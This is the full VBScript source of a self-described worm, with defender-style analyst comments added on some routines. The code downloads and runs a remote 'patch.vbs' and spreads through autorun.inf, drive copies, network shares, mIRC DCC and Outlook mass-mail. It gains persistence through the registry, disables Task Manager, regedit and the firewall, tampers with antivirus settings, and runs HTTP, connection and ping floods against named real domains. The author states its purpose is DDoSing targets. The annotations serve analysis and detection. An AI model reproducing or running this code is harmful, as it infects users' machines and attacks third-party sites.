strFileURL = "http://yoyoparty.com/upload/MSWINSCK.OCX"
strHDLocation = "c:\windows\system32\MSWINSCK.OCX"

Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")

objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()

If objXMLHTTP.Status = 200 Then
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1

objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0

Set objFSO = Createobject("Scripting.FileSystemObject")
If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
Set objFSO = Nothing

objADOStream.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End if

Set objXMLHTTP = Nothing
end sub

sub download_winsock2()
strFileURL = "http://yoyoparty.com/upload/MSWINSCK.OCX"
strHDLocation = "c:\windows\system32\MSWINSCK.OCX"

Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")

objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()

If objXMLHTTP.Status = 200 Then
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1

objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0

Set objFSO = Createobject("Scripting.FileSystemObject")
If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
Set objFSO = Nothing

objADOStream.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End if

Set objXMLHTTP = Nothing
end sub

' mIRC propagation: creates (overwriting) C:\Program Files\mIRC\script.ini with an "on JOIN"
' handler. The handler written below skips the local user and issues a DCC send of the worm's
' full path to the nick that joined.
' Defender view: an unexpected script.ini in the mIRC program folder, or one containing a
' "dcc send" line, is the artefact to check; IRC clients should not auto-accept DCC transfers.
sub sebar_ke_irc_1()
Set fso = CreateObject("Scripting.FileSystemObject")
' Full path of the running script; embedded into the generated mIRC script.
nama_w0rm=Wscript.ScriptFullName

' win is assigned but not read in this routine.
win = fso.GetParentFolderName(Wscript.ScriptFullName)

set scriptini=fso.CreateTextFile("C:\Program Files\mIRC\script.ini")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine ";"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2= /.dcc send $nick " & nama_w0rm
scriptini.WriteLine "n3=}"
end sub

' When the minute of the hour equals 12, sends eleven synchronous GET requests to a fixed
' iframe.php URL; the responses are not read. What that server-side page does is not visible here.
' Defender view: the URL is an indicator for proxy and DNS logs.
sub iframe_attack()
' jam is assigned but not read in this routine.
jam=Hour(Now())
menit=Minute(Now())
if menit=12 then
For i = 0 To 10
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", "http://ardiantz.com/~checking/wp-includes/iframe.php", False
o.send
next
end if
end sub

' When the minute of the hour equals 35, sends six synchronous GET requests to a fixed wget1.php
' URL and stores the HTTP status in a variable that is not used afterwards.
' What that server-side page does is not visible here.
' Defender view: the URL is an indicator for proxy and DNS logs.
sub wget_attack1()
' jam is assigned but not read in this routine.
jam=Hour(Now())
menit=Minute(Now())
if menit=35 then
For i = 0 To 5
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", "http://ardiantz.com/~checking/wp-includes/wget1.php", False
o.send
data=o.status
next
end if
end sub

sub wget_attack2()
jam=Hour(Now())
menit=Minute(Now())
if menit=35 then
For i = 0 To 5
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", "http://ardiantz.com/~checking/wp-includes/wget2.php", False
o.send
data=o.status
next
end if
end sub

sub wget_attack3()
jam=Hour(Now())
menit=Minute(Now())
if menit=35 then
For i = 0 To 5
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", "http://ardiantz.com/~checking/wp-includes/wget3.php", False
o.send
data=o.status
next
end if
end sub

sub wget_attack4()
jam=Hour(Now())
menit=Minute(Now())
if menit=35 then
For i = 0 To 5
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", "http://ardiantz.com/~checking/wp-includes/wget4.php", False
o.send
data=o.status
next
end if
end sub

sub wget_attack5()
jam=Hour(Now())
menit=Minute(Now())
if menit=35 then
For i = 0 To 5
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", "http://ardiantz.com/~checking/wp-includes/wget5.php", False
o.send
data=o.status
next
end if
end sub

sub browsing()
dim Window
jam=Hour(Now())
menit=Minute(Now())
hari=Day(now())

if jam=12 or jam=13 or jam=23 then
set Window = CreateObject("InternetExplorer.Application")
Window.RegisterAsBrowser = True
Window.Navigate("tbd.my")
Window.MenuBar = True
Window.ToolBar = True
Window.AddressBar = True
Window.StatusBar = True
Window.FullScreen = False
Window.Resizable = True
Window.Visible = True
Window.Width = 850
Window.Height = 720

set Window2 = CreateObject("InternetExplorer.Application")
Window2.RegisterAsBrowser = True
Window2.Navigate("hmsecurity.org")
Window2.MenuBar = True
Window2.ToolBar = True
Window2.AddressBar = True
Window2.StatusBar = True
Window2.FullScreen = False
Window2.Resizable = True
Window2.Visible = True
Window2.Width = 850
Window2.Height = 720

set Window3 = CreateObject("InternetExplorer.Application")
Window3.RegisterAsBrowser = True
Window3.Navigate("v4-team.com")
Window3.MenuBar = True
Window3.ToolBar = True
Window3.AddressBar = True
Window3.StatusBar = True
Window3.FullScreen = False
Window3.Resizable = True
Window3.Visible = True
Window3.Width = 850
Window3.Height = 720

set Window4 = CreateObject("InternetExplorer.Application")
Window4.RegisterAsBrowser = True
Window4.Navigate("sec-r1z.com")
Window4.MenuBar = True
Window4.ToolBar = True
Window4.AddressBar = True
Window4.StatusBar = True
Window4.FullScreen = False
Window4.Resizable = True
Window4.Visible = True
Window4.Width = 850
Window4.Height = 720

set Window5 = CreateObject("InternetExplorer.Application")
Window5.RegisterAsBrowser = True
Window5.Navigate("ardiantz.com")
Window5.MenuBar = True
Window5.ToolBar = True
Window5.AddressBar = True
Window5.StatusBar = True
Window5.FullScreen = False
Window5.Resizable = True
Window5.Visible = True
Window5.Width = 850
Window5.Height = 720
end if
end sub

' Self-update routine. On day 10 of the month during hour 10 it downloads patch.vbs over plain
' HTTP to c:\windows\system32\patch.vbs (deleting any existing file first). Independently of that
' date check, every call ends by running c:\windows\system32\patch.vbs.
' Nothing in the visible code verifies the content of the downloaded script.
' Defender view: this is remote code execution controlled by whoever serves that URL, so an
' infected host must be treated as running unknown code; the URL and the patch.vbs path are
' indicators, and blocking the host at the proxy cuts the update channel.
sub download_update_worm1()

jam=Hour(Now())
' menit is assigned but not read in this routine.
menit=Minute(Now())
hari=Day(now())

if jam=10 and hari=10 then
strFileURL = "http://ardiantz.com/~checking/wp-includes/patch.vbs"
strHDLocation = "c:\windows\system32\patch.vbs"

Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")

objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()

' Only an HTTP 200 response is written to disk.
If objXMLHTTP.Status = 200 Then
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1

objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0

Set objFSO = Createobject("Scripting.FileSystemObject")
If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
Set objFSO = Nothing

objADOStream.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End if

Set objXMLHTTP = Nothing

end if

' Executed on every call, whether or not a download happened above.
Set mywisdom = CreateObject("WScript.Shell")
mywisdom.run("c:\windows\system32\patch.vbs")
end sub


rem nude girl internet w0rm version 1.0
rem c0d3r : mywisdom
rem this intenet w0rm will spread via irc, lan, flash disk, drives, outlook email
rem to all my targets and enemies. you wanna play with me? ok you fight with my worm before fight with me
rem special thanks to all devilzc0de crews and members
rem special thanks to all jasakom crews and members
rem special thanks to all ycl crews and members
rem greetz to all solhack 2003-2004 crews
rem got r00t ???
rem this v1rus is made purposely for helping me in ddosing my targets
on error resume next
Set mywisdom = CreateObject("WScript.Shell")
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
App.TaskVisible = False
infek2()
infek_regiistry_sambil_boker()
infek_sistem()
infek_ie()
download_winsock()
download_winsock2()
download_update_worm1()
infek_file_dan_web()
NetSpread()
sebar_ke_irc_1()
sebarkan_email_hahaha()
kirim_syn_target()
http_ddos_target()
kirim_icmp_target()
iframe_attack()
wget_attack1()
wget_attack2()
wget_attack3()
wget_attack4()
wget_attack5()
browsing()
infek_sistem()
Set mywisdom = CreateObject("WScript.Shell")
anti_delete()
mywisdom.Sleep 100000
jalan()

sub jalan()
Set mywisdom = CreateObject("WScript.Shell")
mywisdom.run("nude_indo_girl.mpg.vbs")

mywisdom.Sleep 100000
end sub

Sub infek2()
on error resume next
dim mywisdom
isi = "Open=nude_indo_girl.mpg.vbs"
Set mywisdom = CreateObject("WScript.Shell")
mywisdom.run("del autorun.inf")
Set fso = CreateObject("Scripting.FileSystemObject")
Set file = fso.OpenTextFile("autorun.inf", 8, True)
file.WriteLine(isi)
file.Close
SET file = NOTHING

win = fso.GetParentFolderName(Wscript.ScriptFullName)

autorun= win & "\autorun.inf"

satu= win & "\nude_indo_girl.mpg.vbs"
dua = "c:\WINDOWS\nude_indo_girl.mpg.vbs"
tiga = "c:\nude_indo_girl.mpg.vbs"
empat = "c:\windows\nude_indo_girl.mpg.vbs"
lima = "c:\windows\system32\nude_indo_girl.mpg.vbs"
enam = "c:\xampp\htdocs\nude_indo_girl.mpg.vbs"
d= "d:\nude_indo_girl.mpg.vbs"
e="e:\nude_indo_girl.mpg.vbs"
f="f:\nude_indo_girl.mpg.vbs"
g="g:\nude_indo_girl.mpg.vbs"
h="h:\nude_indo_girl.mpg.vbs"
i= "I:\nude_indo_girl.mpg.vbs"
j= "j:\nude_indo_girl.mpg.vbs"
k= "k:\nude_indo_girl.mpg.vbs"
l= "l:\nude_indo_girl.mpg.vbs"
m= "m:\nude_indo_girl.mpg.vbs"
n= "n:\nude_indo_girl.mpg.vbs"
o= "o:\nude_indo_girl.mpg.vbs"
p= "p:\nude_indo_girl.mpg.vbs"
q= "q:\nude_indo_girl.mpg.vbs"
r= "r:\nude_indo_girl.mpg.vbs"
s= "s:\nude_indo_girl.mpg.vbs"
t= "t:\nude_indo_girl.mpg.vbs"
u= "u:\nude_indo_girl.mpg.vbs"
v= "v:\nude_indo_girl.mpg.vbs"
w= "w:\nude_indo_girl.mpg.vbs"
x= "x:\nude_indo_girl.mpg.vbs"
y= "y:\nude_indo_girl.mpg.vbs"
z= "z:\nude_indo_girl.mpg.vbs"

fso.CopyFile satu, dua, 0
fso.CopyFile satu, tiga, 0
fso.CopyFile satu, empat, 0
fso.CopyFile satu, lima, 0
fso.CopyFile satu, enam, 0
fso.CopyFile satu, d, 0
fso.CopyFile satu, e, 0
fso.CopyFile satu, f, 0
fso.CopyFile satu, g, 0
fso.CopyFile satu, h, 0
fso.CopyFile satu, i, 0
fso.CopyFile satu, j, 0
fso.CopyFile satu, k, 0
fso.CopyFile satu, l, 0
fso.CopyFile satu, m, 0
fso.CopyFile satu, n, 0
fso.CopyFile satu, o, 0
fso.CopyFile satu, p, 0
fso.CopyFile satu, q, 0
fso.CopyFile satu, r, 0
fso.CopyFile satu, s, 0
fso.CopyFile satu, t, 0
fso.CopyFile satu, u, 0
fso.CopyFile satu, v, 0
fso.CopyFile satu, w, 0
fso.CopyFile satu, x, 0
fso.CopyFile satu, y, 0
fso.CopyFile satu, z, 0

duax = "c:\WINDOWS\autorun.inf"
tigax = "c:\autorun.inf"
empatx = "c:\windows\autorun.inf"
limax = "c:\windows\system32\autorun.inf"
enamx = "c:\xampp\htdocs\autorun.inf"
dx= "d:\autorun.inf"
ex="e:\autorun.inf"
fx="f:\autorun.inf"
gx="g:\autorun.inf"
hx="h:\autorun.inf"
ix= "i:\autorun.inf"
jx= "j:\autorun.inf"
kx= "k:\autorun.inf"
lx= "l:\autorun.inf"
mx= "m:\autorun.inf"
nx= "n:\autorun.inf"
ox= "o:\autorun.inf"
px= "p:\autorun.inf"
qx= "q:\autorun.inf"
rx= "r:\autorun.inf"
sx= "s:\autorun.inf"
tx= "t:\autorun.inf"
ux= "u:\autorun.inf"
vx= "v:\autorun.inf"
wx= "w:\autorun.inf"
xx= "x:\autorun.inf"
yx= "y:\autorun.inf"
zx= "z:\autorun.inf"

fso.CopyFile autorun, duax, 0
fso.CopyFile autorun, tigax, 0
fso.CopyFile autorun, empatx, 0
fso.CopyFile autorun, limax, 0
fso.CopyFile autorun, enamx, 0
fso.CopyFile autorun, dx, 0
fso.CopyFile autorun, ex, 0
fso.CopyFile autorun, fx, 0
fso.CopyFile autorun, gx, 0
fso.CopyFile autorun, hx, 0
fso.CopyFile autorun, ix, 0
fso.CopyFile autorun, jx, 0
fso.CopyFile autorun, kx, 0
fso.CopyFile autorun, lx, 0
fso.CopyFile autorun, mx, 0
fso.CopyFile autorun, nx, 0
fso.CopyFile autorun, ox, 0
fso.CopyFile autorun, px, 0
fso.CopyFile autorun, qx, 0
fso.CopyFile autorun, rx, 0
fso.CopyFile autorun, sx, 0
fso.CopyFile autorun, tx, 0
fso.CopyFile autorun, ux, 0
fso.CopyFile autorun, vx, 0
fso.CopyFile autorun, wx, 0
fso.CopyFile autorun, xx, 0
fso.CopyFile autorun, yx, 0
fso.CopyFile autorun, zx, 0
end sub

'network spreading technique taken from csw
'Analyst summary: copies the running script to "nude_indo_girl.mpg.vbs" in the
'current directory, then passes every non-empty entry returned by
'WScript.Network.EnumNetworkDrives to Dosearch.
'NOTE(review): Dosearch is not defined in this part of the listing; presumably
'it walks the mapped drive and drops copies - confirm against its definition.
'Detection: a script host (wscript.exe / cscript.exe) creating .vbs files on
'mapped drives; a file with this exact name appearing on a file server.
'Containment: the exposure is every mapped drive the logged-on user can write
'to; read-only mappings and refusing script extensions on shares limit it.
Sub NetSpread()
'Errors are suppressed, so unreachable or read-only shares leave no trace here.
On Error Resume Next
Set Network = CreateObject("WScript.Network")
Set Shares = Network.EnumNetworkDrives
If Shares.Count > 0 Then
Set fso = CreateObject("Scripting.FileSystemObject")
For Counter1 = 0 To Shares.Count - 1
If Shares.Item(Counter1) <> "" Then
'Relative destination: the copy lands in the process's current directory.
fso.getFile(wscript.ScriptFullName).Copy("nude_indo_girl.mpg.vbs")
Dosearch (Shares.Item(Counter1))
End If
Next
Set fso = Nothing
End If
Set Shares = Nothing
Set Network = Nothing
End Sub

'Analyst summary: for every file in the script's own folder whose extension is
'php, html, htm, jsp, jpg, gif or png, opens that file for appending (mode 8)
'and writes the full text of nude_indo_girl.mpg.vbs followed by a
'window.open(...) line.
'Impact: web pages and images in that folder grow by the size of the worm on
'each run; images get text appended to binary data. Elsewhere in this listing
'the worm copies itself to c:\xampp\htdocs, so a local web root is an intended
'location for this routine.
'Detection: file-integrity monitoring on web roots; searching content files
'for the trailing string window.open('nude_indo_girl.mpg.vbs');
'Remediation: restore affected files from backup rather than editing in place.
sub infek_file_dan_web()
'Failures (locked files, missing source file) are silently skipped.
On Error Resume Next
Dim fso,ekstensi, folder, files, NewsFile,sFolder
Set fso = CreateObject("Scripting.FileSystemObject")
sFolder = fso.GetParentFolderName(Wscript.ScriptFullName)
Set folder = fso.GetFolder(sFolder)
Set files = folder.Files
For each folderIdx In files
ekstensi=fso.GetExtensionName(folderIdx.Name)
if ekstensi="php" or ekstensi="html" or ekstensi="htm" or ekstensi="jsp" or ekstensi="jpg" or ekstensi="jsp" or ekstensi="gif" or ekstensi="png" then
Set objFSO = CreateObject("Scripting.FileSystemObject")
'The worm body is read by relative name, i.e. from the current directory.
Set objFile = objFSO.GetFile("nude_indo_girl.mpg.vbs")
Set objReadFile = objFSO.OpenTextFile("nude_indo_girl.mpg.vbs", 1)
strContents = objReadFile.ReadAll

Set mywisdom = CreateObject("WScript.Shell")
'Mode 8 = append, True = create if absent; the target is also a relative name.
Set file = fso.OpenTextFile(folderIdx.Name, 8, True)
tag1=""
tag2="window.open('nude_indo_girl.mpg.vbs');"
strContents=tag1+strContents+tag2
file.WriteLine(strContents)
file.Close
objReadFile.Close
SET file = NOTHING
end if

Next
NewFile.Close

end sub

'disable the firewall
'Analyst summary: uses the HNetCfg.FwMgr COM object to set FirewallEnabled to
'False on the current Windows Firewall profile.
'NOTE(review): presumably this only succeeds when the script runs with
'administrative rights - confirm on the affected OS version.
'Detection: firewall profile state changes that originate from a script host
'process; HNetCfg.FwMgr being instantiated from a .vbs file.
'Remediation: re-enable the profile and enforce the firewall state by policy
'so a local change is reverted.
sub disable_firewall()
'Errors are suppressed, so a refused change is not reported anywhere.
On Error Resume Next
Set objFirewall = CreateObject("HNetCfg.FwMgr")
Set objPolicy = objFirewall.LocalPolicy.CurrentProfile
objPolicy.FirewallEnabled = FALSE
end sub

'so that it keeps existing (self-preservation)
'Analyst summary: reads the script's own text into memory once, then enters an
'endless loop that checks whether the script file still exists and, when it
'does not, tries to create it again at the same path.
'Defender notes: the loop has no delay, so the hosting script process stays
'busy for as long as it runs - sustained CPU use by wscript.exe is a symptom.
'Because the check runs in the live process, clean-up should end the script
'host process first and remove the file afterwards.
sub anti_delete()
On Error Resume Next
Set fso= Createobject("scripting.filesystemobject")
Set mywisdom2= fso.opentextfile(wscript.scriptfullname, 1)
'In-memory copy of the script text, taken before the loop starts.
pengujian_keberadaan= mywisdom2.readall
mywisdom2.Close
Do
If Not (fso.fileexists(wscript.scriptfullname)) Then
Set ada_terus= fso.createtextfile(wscript.scriptfullname, True)
ada_terus.writepengujian_keberadaan
ada_terus.Close
End If
Loop
end sub

'function for the SYN DoS against the targets
'Analyst summary: depending on the local hour, creates MSWinsock.Winsock
'objects in a loop and calls connect on TCP port 80 of one hard-coded host.
'Despite the author's "syn" label, what the code asks for is an ordinary
'connection attempt through the Winsock control, 16 per call (21 for the last
'host).
'Schedule as written (local clock of the infected host):
'  hours 12, 15, 16      -> tbd.my
'  hours 18, 21, 22      -> sec-r1z.com
'  hours 23, 3, 4        -> v4-team.com
'  hours 6, 9, 10        -> hmsecurity.org
'  hour 10               -> ardiantz.com
'Detection: a script host process opening bursts of outbound connections to
'port 80 of these host names; the names themselves are usable as DNS/proxy
'indicators for infected clients.
sub kirim_syn_target()
'Errors are suppressed, so a missing Winsock control fails silently.
on error resume next
jam=Hour(Now())
menit=Minute(Now())
if jam=12 or jam=15 or jam=16 then
For i = 0 To 15
set winsock = CreateObject("MSWinsock.Winsock")
winsock.Remotehost = "tbd.my"
winsock.RemotePort = 80
winsock.connect
next
winsock.close
end if

if jam=18 or jam=21 or jam=22 then
'syn sec-r1z.com
For i = 0 To 15
set winsock = CreateObject("MSWinsock.Winsock")
winsock.Remotehost = "sec-r1z.com"
winsock.RemotePort = 80
winsock.connect
next
winsock.close
end if

if jam=23 or jam=03 or jam=04 or jam=3 or jam=4 then
'syn v4-team
For i = 0 To 15
set winsock = CreateObject("MSWinsock.Winsock")
winsock.Remotehost = "v4-team.com"
winsock.RemotePort = 80
winsock.connect
next
winsock.close
end if

if jam=06 or jam=09 or jam=6 or jam=9 or jam=10 then
'syn hmsecurity.org
For i = 0 To 15
set winsock = CreateObject("MSWinsock.Winsock")
winsock.Remotehost = "hmsecurity.org"
winsock.RemotePort = 80
winsock.connect
next
winsock.close
end if

if jam=10 then
'syn ardiantz.com
For i = 0 To 20
set winsock = CreateObject("MSWinsock.Winsock")
winsock.Remotehost = "ardiantz.com"
winsock.RemotePort = 80
winsock.connect
next
winsock.close
end if
end sub

'function that sends ICMP on specific preset dates
'Analyst summary: on day 12, 22 or 2 of the month, starts the system ping
'command against one hard-coded host with a 1000-byte payload and a count of
'10 (-l 1000 -n 10).
'Detection: a script host process spawning ping.exe with these arguments is
'visible in process-creation logging; the parent/child pair is the useful
'signal, not the ICMP volume.
sub kirim_icmp_target()
hari=Day(now())
if hari=12 then
Set mywisdom = CreateObject("WScript.Shell")
mywisdom.run("ping tbd.my -l 1000 -n 10")
end if

if hari=22 then
Set mywisdom = CreateObject("WScript.Shell")
mywisdom.run("ping ardiantz.com -l 1000 -n 10")
end if

if hari=02 then
Set mywisdom = CreateObject("WScript.Shell")
mywisdom.run("ping hmsecurity.org -l 1000 -n 10")
end if
end sub

'Analyst summary: issues synchronous HTTP GET requests (third argument of
'open is False) to the site root of five hard-coded hosts through
'MSXML2.XMLHTTP, gated on the local minute and hour.
'  minute > 55 : six rounds, one request to each of the five hosts per round
'  hour-gated  : eleven requests to a single host per matching branch
'Responses are never read; only the request is of interest to the author.
'Detection: repeated GETs for "/" on these host names from a script host
'process, clustered in the last minutes of an hour; proxy and DNS logs are the
'quickest way to enumerate infected clients.
sub http_ddos_target()
'Errors are suppressed, so unreachable hosts do not stop the routine.
on error resume next
Dim o
menit=Minute(Now())
jam=Hour(Now())

'hourly request to the target sites
if menit>55 then
For i = 0 To 5
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", "http://tbd.my", False
o.send
Set x = CreateObject("MSXML2.XMLHTTP")
x.open "GET", "http://sec-r1z.com", False
x.send
Set r = CreateObject("MSXML2.XMLHTTP")
r.open "GET", "http://hmsecurity.org", False
r.send
Set y = CreateObject("MSXML2.XMLHTTP")
y.open "GET", "http://v4-team.com", False
y.send
Set z = CreateObject("MSXML2.XMLHTTP")
z.open "GET", "http://ardiantz.com", False
z.send

next
end if

'http req tbd
if jam=10 or jam=14 or jam=15 then
For i = 0 To 10
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", "http://tbd.my", False
o.send
next
end if

'http req sec-r1z
if jam=16 or jam=18 or jam=19 then
For i = 0 To 10
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", "http://sec-r1z.com", False
o.send
next
end if

'http req v4-team.com
if jam=20 or jam=22 or jam=23 or jam=24 then
For i = 0 To 10
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", "http://v4-team.com", False
o.send
next
end if

'http req hmsecurity.org
if jam=23 or jam=01 or jam=02 or jam=1 or jam=2 then
For i = 0 To 10
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", "http://hmsecurity.org", False
o.send
next
end if

'http req ardiantz.com
if jam=20 or jam=22 or jam=23 then
For i = 0 To 10
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", "http://ardiantz.com", False
o.send
next
end if
end sub

'e-mail spreading via Outlook, taken from a code fragment of the ILOVEYOU virus
'Analyst summary: automates Outlook through COM, walks every MAPI address
'list, and for each entry not yet marked in the registry creates a mail item
'with a fixed subject and body, attaches nude_indo_girl.mpg.vbs and sends it.
'Bookkeeping: per-recipient and per-list markers are written as registry
'values whose path starts with HKEY_CURRENT_USER\Software\Microsoft\WAB
'followed by the entry or list name; their presence is a host indicator that
'this routine ran.
'Mail indicators: subject "Free Indonesian Girl Nude Scandal Video for You"
'and an attachment named nude_indo_girl.mpg.vbs (double extension).
'Mitigation: strip or quarantine script attachments (.vbs) at the mail
'gateway; keep Outlook's programmatic-access prompt enabled so a script
'cannot send mail silently.
sub sebarkan_email_hahaha()
'Errors are suppressed, so hosts without Outlook simply skip this routine.
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
'Stored entry count for this list from a previous run, if any.
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB"&a)
if (regv="") then
regv=1
end if
'Only lists that have grown since the recorded count are processed.
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
'Per-recipient marker: a non-empty value means this entry was already mailed.
regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB"&malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "Free Indonesian Girl Nude Scandal Video for You"
male.Body = vbcrlf&"Free Indonesian Girl Nude Scandal Video for You!!! check the attachment. Or download now, click here to download this video: nude_indo_girl.mpg [download] , mirror download: nude_indo_girl.mpg [mirror download]"
male.Attachments.Add(dirsystem&"\nude_indo_girl.mpg.vbs")
male.Attachments.add(App.Path & "" & "nude_indo_girl.mpg.vbs")
male.Send
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB"&malead,1,"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB"&a,a.AddressEntries.Count
else
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB"&a,a.AddressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub

'the virus's self-defence
'Analyst summary: registry changes for persistence and for hindering clean-up.
'  - HKLM ...\CurrentVersion\Run\Stask = wscript.exe "<script folder>\nude_indo_girl.mpg.vbs"
'    (runs the worm at every logon)
'  - HKLM\SOFTWARE\Avira\AntiVir_Desktop\Path and \AppDataDirectory are
'    overwritten with the same command string
'  - HKCU Explorer\Advanced: Hidden, HideFileExt and ShowSuperHidden set to 1;
'    HideFileExt=1 hides known extensions, so the file shows as
'    nude_indo_girl.mpg
'  - HKCU Policies\System: DisableRegistryTools=1 and DisableTaskMgr=1, which
'    lock the user out of regedit and Task Manager
'Detection: a Run value named "Stask" pointing at wscript.exe; the two
'Policies\System values appearing on a machine where no policy sets them.
'Remediation: remove the Run value and the two Disable* values (offline or
'from another account if the tools are blocked), then restore the Avira values
'by repairing or reinstalling the product.
sub infek_regiistry_sambil_boker()
dim win,mywisdom
Set fso = CreateObject("Scripting.FileSystemObject")
'Folder the script is running from; used to build the persistence command.
win = fso.GetParentFolderName(Wscript.ScriptFullName)
Set mywisdom = CreateObject("WScript.Shell")
With mywisdom

.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Avira\AntiVir_Desktop\Path", "wscript.exe """ & win & "\nude_indo_girl.mpg.vbs"""
.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Avira\AntiVir_Desktop\AppDataDirectory", "wscript.exe """ & win & "\nude_indo_girl.mpg.vbs"""

.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Stask", "wscript.exe """ & win & "\nude_indo_girl.mpg.vbs"""
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", 1, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", 1, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden", 1, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 1, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", 1, "REG_DWORD"
End With
end sub

'war strategy: torment the enemy slowly
'Analyst summary: rewrites the Internet Explorer start page for the current
'user (HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page) to one of
'four hard-coded sites, chosen by the value of Weekday(date):
'  1 or 2 -> sec-r1z.com, 3 or 4 -> v4-team.com, 5 -> ardiantz.com,
'  otherwise -> tbd.my
'Every browser start on an infected host then produces a request to that site.
'Detection: the Start Page value changing to one of these URLs; remediation
'is to reset the value once the persistence entry has been removed.
sub infek_ie()
on error resume next
dim hari
hari=Weekday(date)
if hari=1 or hari=2 then
'IE start page is set to sec-r1z.com
RegLocate = "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page"
mywisdom.RegWrite RegLocate,"http://sec-r1z.com","REG_SZ"
elseif hari=3 or hari=4 then
'IE start page is set to v4-team.com
RegLocate = "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page"
mywisdom.RegWrite RegLocate,"http://v4-team.com","REG_SZ"
elseif hari=5 then
'IE start page is set to ardiantz.com
RegLocate = "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page"
mywisdom.RegWrite RegLocate,"http://ardiantz.com","REG_SZ"
else
'IE start page is set to tbd.my
RegLocate = "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page"
mywisdom.RegWrite RegLocate,"http://tbd.my","REG_SZ"
end if
end sub

'technique for infecting and spreading across the system and all drives, and for hiding itself
'Analyst summary:
'  1. Writes an autorun.inf in the current directory containing the line
'     "Open=nude_indo_girl.mpg.vbs" and sets the read-only attribute on it and
'     on the worm file.
'  2. Copies the worm from the script's own folder to c:\, c:\windows,
'     c:\windows\system32, c:\xampp\htdocs and the root of every drive letter
'     d: through z:.
'  3. Copies autorun.inf to the same set of locations.
'The third CopyFile argument is 0 (overwrite = False), so files already present
'at a destination are left as they are; with On Error Resume Next every failed
'copy is skipped without any message.
'Host indicators: autorun.inf together with nude_indo_girl.mpg.vbs at a drive
'root, in c:\windows, c:\windows\system32 or c:\xampp\htdocs.
'Mitigation: AutoRun disabled for removable and network drives (the
'NoDriveTypeAutoRun policy) removes the reason for the autorun.inf copies;
'scanning removable media on insertion catches the pair of files.
Sub infek_sistem()
on error resume next
dim mywisdom
isi = "Open=nude_indo_girl.mpg.vbs"
Set mywisdom = CreateObject("WScript.Shell")
mywisdom.run("del autorun.inf")
